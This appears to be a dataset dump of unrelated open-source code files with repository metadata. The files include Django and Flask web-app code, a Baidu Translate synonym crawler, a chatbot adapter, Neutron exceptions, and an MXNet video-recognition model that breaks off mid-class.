rev = v.get('revisions')
if type(rev) is list and rev:
create_ts = rev[0].get('timestamp')
if create_ts is None:
log('%s: Failed to parse created time of [[%s]]' % (cts, title))
log(r)
continue
create_ts = datetime.datetime.strptime(create_ts, '%Y-%m-%dT%H:%M:%SZ')
if (cts - create_ts).days >= delay_days:
ret[i] = True
return ret
def gen_rev(text):
site = botsite.Site()
lines = text.splitlines()
articles = [remove_nottext(line.strip()[1:]) for line in lines[1:-2]]
exists = [False] * len(articles)
html = site.parse('[['+']][['.join(articles)+']]')
soup = BeautifulSoup(html, 'html.parser')
i = 0
for a in soup.find_all('a'):
if '&action=edit&redlink=1' not in a.get('href'):
exists[i] = True
i += 1
to_remove = check_create_time(site, articles, exists)
if not any(to_remove):
return None
n_articles = [lines[i+1] for i in range(len(articles)) if not to_remove[i]]
prefix, suffix = lines[0], lines[-2] + '\n' + lines[-1]
new_text = prefix + '\n' + '\n'.join(n_articles) + '\n' + suffix
summary = get_summary('rcarl', '移除%d个已存在条目' % (len(articles)-len(n_articles)))
return {'text': new_text, 'summary': summary}
@check('rcarl')
def main():
load_whitelist()
EditQueue().push(title=working_title, text=gen_rev,
bot=1, minor=1, task='rcarl')
if __name__ == '__main__':
site = botsite.Site()
print(gen_rev(site.get_text_by_title(working_title))['text'])
| [
"daizl@pku.edu.cn"
] | daizl@pku.edu.cn |
423dc96768d50d0ce647be99f48163b749c1a1e8 | 6c33e95a0f9e666a52f328b1926a3dd1d4e5ceca | /products/urls.py | 74920e4951f4e9b7ae73c06ddcf8a0c4db408f68 | [] | no_license | arpit-saxena/DevRecruitBackend | 69a0a7e694c6401df3bc87165d86353da3003410 | e49b4a6bda6a65522f2af88bc11559fda0a514f8 | refs/heads/master | 2020-04-26T03:50:36.741741 | 2019-03-15T11:15:40 | 2019-03-15T11:15:40 | 173,281,082 | 0 | 0 | null | 2019-03-13T11:22:15 | 2019-03-01T10:15:24 | Python | UTF-8 | Python | false | false | 292 | py | from django.urls import path
from . import views
urlpatterns = [
path('add', views.addProduct, name='add_product'),
path('<my_hash>/<slug:slug>/', views.viewProduct,
name='view_product'),
path('<my_hash>/<slug:slug>/modify', views.modifyProduct,
name='modify_product'),
] | [
"arpit.saxena2000@yahoo.in"
] | arpit.saxena2000@yahoo.in |
a2e4eb891f334cfc563bab64d820784eea697502 | 2405037bcbc40bb3125128a7bc265d65a1887988 | /malprogramm/views.py | 67a8a5f93d5a30350c145d88ce77e49e2074d84f | [] | no_license | FriedrichGraefe/malprogramm | 81a9d02046536fc355e20bdf0b31e7a28fa6ba9b | 9cf4ba2d6052033db9a77c3a33ec9d684dcd16aa | refs/heads/master | 2023-02-20T05:02:27.285769 | 2021-01-21T18:01:28 | 2021-01-21T18:01:28 | 325,240,437 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,545 | py | from flask import render_template, request, redirect, send_from_directory
from flask_security import login_required
from malprogramm import app, db
import base64
from malprogramm.models import Image
@app.route('/')
def startseite():
return render_template('startseite.html')
@app.route('/malen', methods=['POST', 'GET'])
@login_required
def malen():
if request.method == 'POST':
# Daten kommen hier an und werden in data gespeichert.
data = request.get_json()
canvasdata = data.get('cdata')
userid = data.get('userid')
imagename = data.get('imgname')
# Unnötiger Anfang vom String wird abgeschnitten.
canvasdata = canvasdata.split(",", 1)[1]
print(imagename)
saveimage = './malprogramm/images/' + imagename + '.png'
print(canvasdata)
# Hier wird das Bild in der Image Tabelle gespeichert.
image = Image(filename=imagename, user_id=userid)
db.session.add(image)
db.session.commit()
# Hier wird das Bild im Ordnerverzeichnis gespeichert
picture_data = base64.b64decode(canvasdata)
with open(saveimage, 'wb') as f:
f.write(picture_data)
return redirect('/', code=303)
else:
return render_template('malen.html')
@app.route('/gallery')
def gallery():
all_images = Image.query.all()
return render_template('gallery.html', images=all_images)
@app.route('/download/<filename>')
def download(filename):
return send_from_directory('images', filename)
| [
"friedrich.graefe@hs-augsburg.de"
] | friedrich.graefe@hs-augsburg.de |
6a620bfe1483232806e3b0ebf8b8c27b4cc96c13 | cbb25468ae43ef8521c4837497630f7a3685b8f0 | /airSolution/management/migrations/0005_auto_20200313_1253.py | 28acce09a86f1ff7e77d6bc6b42f1506c3405577 | [] | no_license | Claudio-Padilha/airSolution | f283001abc501035153dd27977d4d91a0c0482d0 | c71f3bef6e74b5021288ef779fae61ecaa69dbb5 | refs/heads/master | 2021-02-07T01:52:24.403345 | 2020-03-14T02:19:39 | 2020-03-14T02:19:39 | 243,969,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | # Generated by Django 3.0.3 on 2020-03-13 16:53
import builtins
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('management', '0004_auto_20200304_1845'),
]
operations = [
migrations.AddField(
model_name='maquina',
name='install_date',
field=models.DateTimeField(default=builtins.dir),
preserve_default=False,
),
migrations.AlterField(
model_name='visitavenda',
name='seller',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='management.Vendedor'),
),
]
| [
"padilha86@gmail.com"
] | padilha86@gmail.com |
61d7436c0fabed05f221dbd89c4fba3bccea59c9 | 0b344fa1202824ac1b312115c9d85467dd0b2b50 | /neutron/plugins/embrane/common/exceptions.py | 763dabdad242fb42be3b94bd0e040b4739bbe93b | [
"Apache-2.0"
] | permissive | netscaler/neutron | 78f075633462eb6135032a82caf831a7e10b27da | 1a17ee8b19c5440e1300426b5190de10750398e9 | refs/heads/master | 2020-06-04T01:26:12.859765 | 2013-10-17T06:58:30 | 2013-10-17T06:58:30 | 13,155,825 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,202 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Embrane, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Ivar Lazzaro, Embrane, Inc.
from neutron.common import exceptions as neutron_exec
class EmbranePluginException(neutron_exec.NeutronException):
message = _("An unexpected error occurred:%(err_msg)s")
# Not permitted operation
class NonPermitted(neutron_exec.BadRequest):
pass
class StateConstraintException(NonPermitted):
message = _("Operation not permitted due to state constraint violation:"
"%(operation)s not allowed for DVA %(dva_id)s in state "
" %(state)s")
| [
"ivar@embrane.com"
] | ivar@embrane.com |
e3e9f33d0c4837ed75d9d742e6ebc224174b49bf | b65932753a73cc17da5ac3bae8aa161b0ce60469 | /pytorch-pretrained-BERT/scripts/crawler.py | d8fe68f943801b7da99347d343675aeee0dead0b | [
"Apache-2.0"
] | permissive | Albert-Ma/bert-fine-tuned-gain | 24199334b8299a4ef5ca3a637d0074a7e4ea7def | f752c1182f1c800f5f56998e13fd6115929df655 | refs/heads/master | 2022-12-24T05:55:38.541991 | 2019-07-24T13:41:35 | 2019-07-24T13:41:35 | 183,029,262 | 2 | 1 | Apache-2.0 | 2022-12-10T11:01:43 | 2019-04-23T14:11:04 | Python | UTF-8 | Python | false | false | 15,779 | py | import nltk
import time
import random
import argparse
from tqdm import tqdm
from bs4 import BeautifulSoup
from selenium import webdriver
from bs4 import NavigableString
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import Select, WebDriverWait
BASE_URL = 'https://fanyi.baidu.com/?aldtype=16047#en/zh/'
# def load_html(url=None):
# """Open web from browser."""
# try:
# browser = webdriver.Chrome()
# browser.get(url)
# except:
# return None
# return browser
#
#
# def parse_html(brownser, word, flag=True):
# """Parse web and invoked once for synonyms.
# :return [{original word: sentence_list},{synonyms word: sentence_list}]"""
# origin = {}
# result = []
# synonyms_click = 'side-nav'
# nav = brownser.find_element_by_class_name(synonyms_click)
# a = nav.find_element_by_class_name('nav-item')
# WebDriverWait(brownser, 10).until(
# EC.element_to_be_clickable((By.CLASS_NAME, synonyms_click))).click()
# exit(0)
# # origin[word] = crawler(brownser, biligual_examples_xpath)
# # print(origin)
# # if this word does not have biliguai examples,
# if origin[word] is None:
# brownser.quit()
# return {}
# # or this word does not have a verbed sentence
# origin = check_word_pos(origin)
# if len(origin[word]) == 0:
# brownser.quit()
# return {}
# if flag:
# result.append(origin)
# synonyms_xpath = '//*[@id="synonyms"]/ul'
# try: # check if this word has `synonyms`
# brownser.find_element_by_xpath(synonyms_click)
# WebDriverWait(brownser, 10).until(
# EC.element_to_be_clickable((By.XPATH, synonyms_click))).click()
# synonyms = brownser.find_element_by_xpath(synonyms_xpath)
# except:
# print("word ({}) has no synonyms".format(word))
# brownser.quit()
# return result
# word_group = synonyms.find_elements_by_class_name('search-js')
# # '#synonyms > ul > p:nth-child(2) > span:nth-child(1) > a'
# for w in word_group:
# try: # if there is something wrong here, we skip it.
# driver = load_html(w.get_attribute('href'))
# if driver is None:
# driver.quit()
# time.sleep(60)
# continue
# # We just consider one single word.
# if len(w.text.strip().split()) > 1:
# driver.quit()
# continue
# sysn = parse_html(driver, w.text, False)
# print("word ({})'s sysn ({})".format(word, sysn))
# if len(sysn) == 0 or len(sysn[w.text]) == 0:
# driver.quit()
# else:
# result.append(sysn)
# driver.quit()
# except:
# continue
# brownser.quit()
# return result
# else:
# # if this is the last web to crawl, we return dict{word: sentences}
# brownser.quit()
# return origin
#
#
# def crawler(brownser, xpath):
# """Crawl data from web.
# :return sentence_list"""
# original = []
# try:
# brownser.find_element_by_xpath(xpath)
# except:
# return None
# soup = BeautifulSoup(brownser.page_source, "html.parser")
# res = soup.select('#bilingual > ul')
# for sents in res: # ul
# for s in sents: # <li>
# sents = []
# for i, p in enumerate(s):
# if isinstance(p, str):
# continue
# else:
# if i == 1:
# if len(p) != 0:
# for sp in p:
# if isinstance(sp, NavigableString):
# continue
# sents.append(sp.text.strip())
# if len(sents) == 0:
# continue
# original.append(" ".join(sents))
# return original
#
#
# def build_pairwise(result):
# """Build pairwise data."""
# # word1 \t word2 \t sentence1 \t sentence2
# assert len(result) > 1
# lines = []
# for i, item in enumerate(result):
# word = list(item)[0]
# sentence_list = list(item.values())[0]
# if len(sentence_list) == 0:
# print("original word:{} does not have a 'verbed' sentence"
# .format(word))
# return lines
# # print(word, sentence_list)
# if i == 0:
# origin_word = word
# origin_sentences = sentence_list
# else:
# for sentence in sentence_list:
# lines.append("{}\t{}\t{}\t{}".
# format(origin_word, word,
# random.sample(origin_sentences, 1)[0],
# sentence))
# return lines
#
#
# def check_word_pos(word_sentence_dict):
# """Check if this word is a VB, delete those which it's not a VB sentence.
# :return {word: sentence_list}"""
# word = list(word_sentence_dict)[0]
# sentences = list(word_sentence_dict.values())[0]
#
# result_sentences = []
# pos_tags = []
# for sentence in sentences:
# # TODO: cause we only use one single word, so we do a word_tokenize and do one word match
# pos_tags.append(nltk.pos_tag(nltk.word_tokenize(sentence)))
# for i, pos_tag_sentence in enumerate(pos_tags):
# # sentence
# flag = False
# for pos_tag_word in pos_tag_sentence:
# if pos_tag_word[0] == word:
# if str(pos_tag_word[1]).startswith('VB'):
# print("word:({}), in this sentence:({}) is a verb."
# .format(word, sentences[i]))
# flag = True
# break
# if flag:
# result_sentences.append(sentences[i])
# return {word: result_sentences}
#
#
# def main():
# words = []
# with open(args.vocab_file, 'r') as f:
# lines = f.readlines()
# for i, word in enumerate(lines):
# if i <= 647:
# continue
# if i > 2000:
# break
# words.append(word.split('\t')[0])
#
# words = ['make']
# c = 0
# with open(args.output_file, 'a+') as writer:
# for i, word in enumerate(tqdm(words)):
# # if c > 647:
# # print("lines:{} break.".format(i))
# # break
# driver = load_html(BASE_URL+word)
# result = parse_html(driver, word)
# # if this word does not have syns
# if len(result) <= 1:
# continue
# lines = build_pairwise(result)
# print("word:{}, result:{}".format(word, lines))
# print("*"*20)
# for line in lines:
# if len(line.strip()) == 0:
# continue
# writer.write(line + '\n')
# c += 1
# # writer.close()
# # exit(0)
# driver.quit()
# # time.sleep(5)
#
#
# if __name__ == '__main__':
# parser = argparse.ArgumentParser()
# parser.add_argument("--vocab_file", type=str, required=True)
# parser.add_argument("--output_file", default='result.txt', type=str, required=True)
#
# args = parser.parse_args()
#
# main()
import execjs
import requests
import re
import json
JS_CODE = """
function a(r, o) {
for (var t = 0; t < o.length - 2; t += 3) {
var a = o.charAt(t + 2);
a = a >= "a" ? a.charCodeAt(0) - 87 : Number(a),
a = "+" === o.charAt(t + 1) ? r >>> a: r << a,
r = "+" === o.charAt(t) ? r + a & 4294967295 : r ^ a
}
return r
}
var C = null;
var token = function(r, _gtk) {
var o = r.length;
o > 30 && (r = "" + r.substr(0, 10) + r.substr(Math.floor(o / 2) - 5, 10) + r.substring(r.length, r.length - 10));
var t = void 0,
t = null !== C ? C: (C = _gtk || "") || "";
for (var e = t.split("."), h = Number(e[0]) || 0, i = Number(e[1]) || 0, d = [], f = 0, g = 0; g < r.length; g++) {
var m = r.charCodeAt(g);
128 > m ? d[f++] = m: (2048 > m ? d[f++] = m >> 6 | 192 : (55296 === (64512 & m) && g + 1 < r.length && 56320 === (64512 & r.charCodeAt(g + 1)) ? (m = 65536 + ((1023 & m) << 10) + (1023 & r.charCodeAt(++g)), d[f++] = m >> 18 | 240, d[f++] = m >> 12 & 63 | 128) : d[f++] = m >> 12 | 224, d[f++] = m >> 6 & 63 | 128), d[f++] = 63 & m | 128)
}
for (var S = h,
u = "+-a^+6",
l = "+-3^+b+-f",
s = 0; s < d.length; s++) S += d[s],
S = a(S, u);
return S = a(S, l),
S ^= i,
0 > S && (S = (2147483647 & S) + 2147483648),
S %= 1e6,
S.toString() + "." + (S ^ h)
}
"""
class Dict:
def __init__(self):
self.sess = requests.Session()
self.headers = {
'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'
}
self.token = None
self.gtk = None
# 获得token和gtk
# 必须要加载两次保证token是最新的,否则会出现998的错误
self.loadMainPage()
self.loadMainPage()
def loadMainPage(self):
"""
load main page : https://fanyi.baidu.com/
and get token, gtk
"""
url = 'https://fanyi.baidu.com'
try:
r = self.sess.get(url, headers=self.headers)
self.token = re.findall(r"token: '(.*?)',", r.text)[0]
self.gtk = re.findall(r"window.gtk = '(.*?)';", r.text)[0]
except Exception as e:
raise e
# print(e)
def langdetect(self, query):
"""
post query to https://fanyi.baidu.com/langdetect
return json
{"error":0,"msg":"success","lan":"en"}
"""
url = 'https://fanyi.baidu.com/langdetect'
data = {'query': query}
try:
r = self.sess.post(url=url, data=data)
except Exception as e:
raise e
# print(e)
json = r.json()
if 'msg' in json and json['msg'] == 'success':
return json['lan']
return None
def dictionary(self, query):
"""
max query count = 2
get translate result from https://fanyi.baidu.com/v2transapi
"""
url = 'https://fanyi.baidu.com/v2transapi'
sign = execjs.compile(JS_CODE).call('token', query, self.gtk)
lang = self.langdetect(query)
data = {
'from': 'en' if lang == 'en' else 'zh',
'to': 'zh' if lang == 'en' else 'en',
'query': query,
'simple_means_flag': 3,
'sign': sign,
'token': self.token,
}
try:
r = self.sess.post(url=url, data=data)
except Exception as e:
raise e
if r.status_code == 200:
json = r.json()
if 'error' in json:
raise Exception('baidu sdk error: {}'.format(json['error']))
# 998错误则意味需要重新加载主页获取新的token
return json
return None
def dictionary_by_lang(self, query, fromlang, tolang):
"""
max query count = 2
get translate result from https://fanyi.baidu.com/v2transapi
"""
url = 'https://fanyi.baidu.com/v2transapi'
sign = execjs.compile(JS_CODE).call('token', query, self.gtk)
lang = self.langdetect(query)
data = {
'from': fromlang,
'to': tolang,
'query': query,
'simple_means_flag': 3,
'sign': sign,
'token': self.token,
}
try:
r = self.sess.post(url=url, data=data)
except Exception as e:
raise e
if r.status_code == 200:
json = r.json()
if 'error' in json:
raise Exception('baidu sdk error: {}'.format(json['error']))
# 998错误则意味需要重新加载主页获取新的token
# print(json)
return self.parse_data(json)
return None
def trans_baidu_en1(self, text):
the_ret = self.dictionary_by_lang(text, "zh", "en")
ret1 = self.dictionary_by_lang(the_ret, "en", "zh")
return ret1
def parse_data(self, json):
synonym_data = json["dict_result"]
# check if this word have synonyms
if 'synonym' in synonym_data:
synonym_data = synonym_data["synonym"]
else:
return None
pairwise_result = []
for item in synonym_data:
# 'words' are not always correct
# words = item['words']
# TODO: a (an)
synonyms = item['synonyms']
synonyms_list = []
words = []
for item in synonyms:
if 'ex' in item and len(item['ex']) != 0:
synonyms_list.append(item['ex'])
words.append(item['syn']['word'])
elif 'be' in item: # 'after'
tmp = []
for i, sub_item in enumerate(item['be']['item']):
tmp.append(sub_item['ex'])
# print(tmp)
synonyms_list.append(tmp[0])
words.append(item['syn']['word'])
else:
raise ValueError("word do not have 'ex'")
# print(synonyms_list)
for i in range(len(words)-1):
for j in range(i+1, len(words)):
line = "{}\t{}\t{}\t{}"\
.format(words[i], words[j],
random.sample(synonyms_list[i], 1)[0]['enText'],
random.sample(synonyms_list[j], 1)[0]['enText'])
pairwise_result.append(line)
return pairwise_result
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--vocab_file", type=str, required=True)
parser.add_argument("--output_file", default='result.txt', type=str, required=True)
parser.add_argument("--min_count", default=100, type=int)
parser.add_argument("--debug", action='store_true')
args = parser.parse_args()
baidu_dict = Dict()
words = []
with open(args.vocab_file, 'r') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if i < 788:
continue
word, count = line.split('\t')
if int(count) > args.min_count:
words.append(word)
if args.debug:
words = ['after', 'too', 'speed']
synonyms_vocab = set()
with open(args.output_file, 'a+') as writer:
for i, word in enumerate(tqdm(words)):
res = baidu_dict.dictionary_by_lang(word, "en", "zh")
print("="*20)
print("word:{}, result:{}".format(word, res))
# word do not have synonyms
if res is None:
continue
for line in res:
if len(line.strip()) == 0:
continue
word_a, word_b, _, _ = line.split('\t')
if '\t'.join([word_a, word_b]) not in synonyms_vocab:
synonyms_vocab.add('\t'.join([word_a, word_b]))
writer.write(line + '\n')
time.sleep(1)
| [
"xymasdu@163.com"
] | xymasdu@163.com |
a389369331938ca08113608bad0aab9013523972 | a9e1e853717e8cb89f02c035915dd02eca800b44 | /logic/logic_adapter.py | 429a81c2f5904b259af28682a0a2056cc358b57e | [] | no_license | sobhanlenka/mitoo | b314774603803609333fa530cf135ec6b65b050a | 9c30eb186d8f9e61cd5db6e98929d25814def758 | refs/heads/master | 2022-11-14T12:13:22.786968 | 2018-07-05T06:32:25 | 2018-07-05T06:32:25 | 138,338,235 | 0 | 1 | null | 2022-10-18T13:08:04 | 2018-06-22T18:56:23 | Python | UTF-8 | Python | false | false | 3,685 | py | from __future__ import unicode_literals
from mitoo.adapters import Adapter
from mitoo.utils import import_module
class LogicAdapter(Adapter):
"""
This is an abstract class that represents the interface
that all logic adapters should implement.
:param statement_comparison_function: The dot-notated import path to a statement comparison function.
Defaults to ``levenshtein_distance``.
:param response_selection_method: The a response selection method.
Defaults to ``get_first_response``.
"""
def __init__(self, **kwargs):
super(LogicAdapter, self).__init__(**kwargs)
from mitoo.comparisons import levenshtein_distance
from mitoo.response_selection import get_first_response
# Import string module parameters
if 'statement_comparison_function' in kwargs:
import_path = kwargs.get('statement_comparison_function')
if isinstance(import_path, str):
kwargs['statement_comparison_function'] = import_module(import_path)
if 'response_selection_method' in kwargs:
import_path = kwargs.get('response_selection_method')
if isinstance(import_path, str):
kwargs['response_selection_method'] = import_module(import_path)
# By default, compare statements using Levenshtein distance
self.compare_statements = kwargs.get(
'statement_comparison_function',
levenshtein_distance
)
# By default, select the first available response
self.select_response = kwargs.get(
'response_selection_method',
get_first_response
)
def get_initialization_functions(self):
"""
Return a dictionary of functions to be run once when the chat bot is instantiated.
"""
return self.compare_statements.get_initialization_functions()
def initialize(self):
for function in self.get_initialization_functions().values():
function()
def can_process(self, statement):
"""
A preliminary check that is called to determine if a
logic adapter can process a given statement. By default,
this method returns true but it can be overridden in
child classes as needed.
:rtype: bool
"""
return True
def process(self, statement):
"""
Override this method and implement your logic for selecting a response to an input statement.
A confidence value and the selected response statement should be returned.
The confidence value represents a rating of how accurate the logic adapter
expects the selected response to be. Confidence scores are used to select
the best response from multiple logic adapters.
The confidence value should be a number between 0 and 1 where 0 is the
lowest confidence level and 1 is the highest.
:param statement: An input statement to be processed by the logic adapter.
:type statement: Statement
:rtype: Statement
"""
raise self.AdapterMethodNotImplementedError()
@property
def class_name(self):
"""
Return the name of the current logic adapter class.
This is typically used for logging and debugging.
"""
return str(self.__class__.__name__)
class EmptyDatasetException(Exception):
def __init__(self, value='An empty set was received when at least one statement was expected.'):
self.value = value
def __str__(self):
return repr(self.value)
| [
"sobhanlenka@gmail.com"
] | sobhanlenka@gmail.com |
3ba7d3ae1a5af39ab73f989f58e0695be999fd45 | 0d3a8de8a5e4cebe091fa1d447411e4a28087c5c | /checkout/migrations/0003_auto_20200301_2355.py | dda7b3f0fe30ad263f8fc2295968d4af9a2fd141 | [
"MIT"
] | permissive | tstauras83/Django-milestone-project-P2 | b66792cf8430263df1cefc45c6780d9880a5707c | e8b973f91e0a0386c140ecfa396f245cc4e0350f | refs/heads/main | 2023-03-13T05:05:52.210359 | 2021-02-28T20:38:56 | 2021-02-28T20:38:56 | 340,364,524 | 0 | 1 | MIT | 2021-02-28T18:15:37 | 2021-02-19T12:35:58 | HTML | UTF-8 | Python | false | false | 429 | py | # Generated by Django 3.0.1 on 2020-03-01 23:55
from django.db import migrations
import django_countries.fields
class Migration(migrations.Migration):
dependencies = [
('checkout', '0002_auto_20200301_0129'),
]
operations = [
migrations.AlterField(
model_name='order',
name='country',
field=django_countries.fields.CountryField(max_length=2),
),
]
| [
"74678836+tstauras83@users.noreply.github.com"
] | 74678836+tstauras83@users.noreply.github.com |
36eef88f9be11b834b7c966f8e0e37c3e0e6c41b | 8388d0ed8ad412c47d47dd9da8f05e35f7e2644c | /accepted/48-rotate-image.py | 7a18dd7fa4f48ec671c91742020ac5e4795f1851 | [] | no_license | luodichen/leetcode-solution | d4cd5abbb0f5cf640035b563ed566c706d4fcbed | 74c2f9e0e60e64c84be6db9b0511db037d12b109 | refs/heads/master | 2020-05-16T16:45:42.056541 | 2015-11-16T05:41:59 | 2015-11-16T05:41:59 | 39,545,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # https://leetcode.com/problems/rotate-image/
class Solution:
# @param {integer[][]} matrix
# @return {void} Do not return anything, modify matrix in-place instead.
def rotate(self, matrix):
if 0 == len(matrix):
return list()
result = []
col_len = len(matrix[0])
for i in xrange(col_len):
result_row = []
for row in matrix[::-1]:
result_row.append(row[i])
result.append(result_row)
del matrix[:]
for row in result:
matrix.append(row)
| [
"me@luodichen.com"
] | me@luodichen.com |
b0b3ce9da76ade12271847e373617198e6aaedbe | d21cf21a8bd3a21bd6f9ed51f88c97caaf796ab7 | /exam3/2.py | efdbd675bd2133aa8469a6837ce76a5f3d36e308 | [] | no_license | timtim1342/HSE-Programming | 8aea880c48bc1ceba97b72cc104be204bfa9fe4d | d4bdc4a2996b3c7ddf32919ed9d5e5a9c38972aa | refs/heads/master | 2018-09-06T06:28:37.243634 | 2018-06-19T09:49:00 | 2018-06-19T09:49:00 | 105,033,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,005 | py | import os, re#не успел перевести все в один файл
abr = {}
def files_in_dir(): #список файлов в дир.
return os.listdir()
def change_dir(dir_name): #меняет директорию
os.chdir(dir_name)
def opn(name):
with open(name, encoding='windows-1251') as f:
text = f.read()
return text
def find_abr(file_names):
global abr
for file in file_names:
txt = opn(file)
ab = []
ab.extend(re.findall(r'lex=\"([А-Я]+)\"', txt))
for name in ab:
if name in abr.keys():
abr[name] += 1
else:
abr[name] = 1
def write_csv():
global abr
with open('exam2.csv','w', encoding='utf-16') as f:
for key in abr.keys():
f.write(key + '\t' + str(abr[key]))
f.write('\n')
def main():
change_dir('news')
find_abr(files_in_dir())
write_csv()
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | timtim1342.noreply@github.com |
581124b6720460f7dbcacd1229e19d30f617319e | a0a787923477b8c944b0973c932aaef379b573f5 | /model_zoo/ECOold.py | 02f817108bafce1b7037358d427dfd7142b11d21 | [] | no_license | bdus/Action-Recognition | 553e0b91ce54c0b049c826273b8c16df733075a1 | e2081963afbb89c4db12034f0168377d0369b789 | refs/heads/master | 2022-10-15T08:56:23.448630 | 2020-06-16T14:34:52 | 2020-06-16T14:34:52 | 218,713,321 | 1 | 0 | null | 2020-01-22T10:49:04 | 2019-10-31T07:57:05 | HTML | UTF-8 | Python | false | false | 15,619 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 7 17:48:26 2020
@author: bdus
eco
from mxnet import nd
from model_zoo import get_model as myget
net = myget(name='eco_resnet18_v1b_k400',nclass=101,num_segments=32,input_channel=3,batch_normal=False)
X = nd.zeros(shape=(5,32,3,224,224))
X = X.reshape((-1,) + X.shape[2:])
net(X).shape == (5,101)
reference :
https://github.com/jangho2001us/pytorch_eco/blob/master/resnet_3d.py
https://data.lip6.fr/cadene/pretrainedmodels/
https://github.com/apache/incubator-mxnet/blob/master/example/image-classification/symbols/inception-bn.py
t= nd.zeros(shape=(5,segment,3,224,224))
t = t.reshape((-1,) + t.shape[2:])
N=8时候 [512,1024]
N=16时候 shape=(512,2048)
import mxnet as mx
from model_zoo import get_model as myget
from mxnet import nd ,init
from mxnet.gluon import nn
basemodel = 'resnet18_v1b'
basemodel = 'resnet34_v1b'
basemodel = 'resnet18_v1b_ucf101'
basemodel = 'resnet34_v1b_ucf101'
basemodel = 'resnet18_v1b_k400_ucf101'
basemodel = 'resnet34_v1b_k400_ucf101'
basemodel = 'resnet50_v1b'
basemodel = 'resnet101_v1b'
basemodel = 'resnet152_v1b'
basemodel = 'resnet50_v1b_ucf101'
basemodel = 'resnet101_v1b_ucf101'
basemodel = 'resnet152_v1b_ucf101'
basemodel = 'resnet50_v1b_k400_ucf101'
basemodel = 'resnet101_v1b_k400_ucf101'
basemodel = 'resnet152_v1b_k400_ucf101'
def printmodel(basemodel,segment=4,expo=1):
t= nd.zeros(shape=(5,segment,3,224,224))
t = t.reshape((-1,) + t.shape[2:])
basenet = myget(name=basemodel,nclass=101,num_segments=1,input_channel=3,batch_normal=False)
basenet.initialize()
t = basenet.conv1(t)
print("conv1:",t.shape)
t = basenet.bn1(t)
t = basenet.relu(t)
t = basenet.maxpool(t)
print("maxpool:",t.shape)
t = basenet.layer1(t)
print("layer1:",t.shape)
t = basenet.layer2(t)
print("layer2:",t.shape)
t = t.reshape((-1,segment,128*expo,28,28))
print("reshape:",t.shape)
t = t.transpose(axes=(0,2,1,3,4))
print("transpose:",t.shape)
printmodel('resnet50_v1b_ucf101',4,4)
printmodel('resnet18_v1b_ucf101',4,1)
printmodel('resnet50_v1b_ucf101',8,4)
printmodel('resnet18_v1b_ucf101',8,1)
printmodel('resnet50_v1b_ucf101',16,4)
printmodel('resnet18_v1b_ucf101',16,1)
printmodel('resnet50_v1b_ucf101',32,4)
printmodel('resnet18_v1b_ucf101',32,1)
def getf3d(exp=1,temp=1,avgtmp=1):
f3d = nn.HybridSequential(prefix='')
# conv3_x
f3d.add(BasicBlock(in_channel=128*exp,out_channel=128,spatial_stride=1,temporal_stride=temp))
f3d.add(BasicBlock(in_channel=128,out_channel=128,spatial_stride=1,temporal_stride=1))
# conv4_x
f3d.add(BasicBlock(in_channel=128,out_channel=256,spatial_stride=2,temporal_stride=2))
f3d.add(BasicBlock(in_channel=256,out_channel=256,spatial_stride=1,temporal_stride=1))
# conv5_x
f3d.add(BasicBlock(in_channel=256,out_channel=512,spatial_stride=2,temporal_stride=2))
f3d.add(BasicBlock(in_channel=512,out_channel=512,spatial_stride=1,temporal_stride=1))
f3d.add(nn.AvgPool3D(pool_size=(avgtmp,7,7)))
f3d.initialize()
return f3d
f3d = getf3d(1,1)
f3d = getf3d(1,2)
f3d = getf3d(4,1)
f3d = getf3d(4,2)
f3d = getf3d(1,1,2)
f3d = getf3d(1,2,2)
f3d = getf3d(4,1,2)
f3d = getf3d(4,2,2)
print("features_3d:",f3d(nd.zeros(shape=(5,128,4,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,128,8,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,128,16,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,128,32,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,512,4,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,512,8,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,512,16,28,28))).shape)
print("features_3d:",f3d(nd.zeros(shape=(5,512,32,28,28))).shape)
"""
import os
import mxnet as mx
from mxnet import init
from mxnet.gluon import nn
#from mxnet.gluon.nn import HybridBlock
from gluoncv.model_zoo import get_model
from .r2plus1d import conv3x1x1,Conv2Plus1D
from .r2plus1d import BasicBlock as BasicBlock_2Plus1D
__all__ = ['eco_resnet18_v2','eco_resnet18_v1b','eco_resnet18_v1b_k400','eco_resnet34_v1b','eco_resnet34_v1b_k400','eco_resnet50_v1b','eco_resnet50_v1b_k400','eco_resnet101_v1b','eco_resnet101_v1b_k400','eco_resnet152_v1b','eco_resnet152_v1b_k400','eco_resnet18_v1b_k400_ucf101']
class BasicBlock(nn.HybridBlock):
def __init__(self, in_channel,out_channel, spatial_stride=1,temporal_stride=1,downsample=None,**kwargs):
super(BasicBlock,self).__init__()
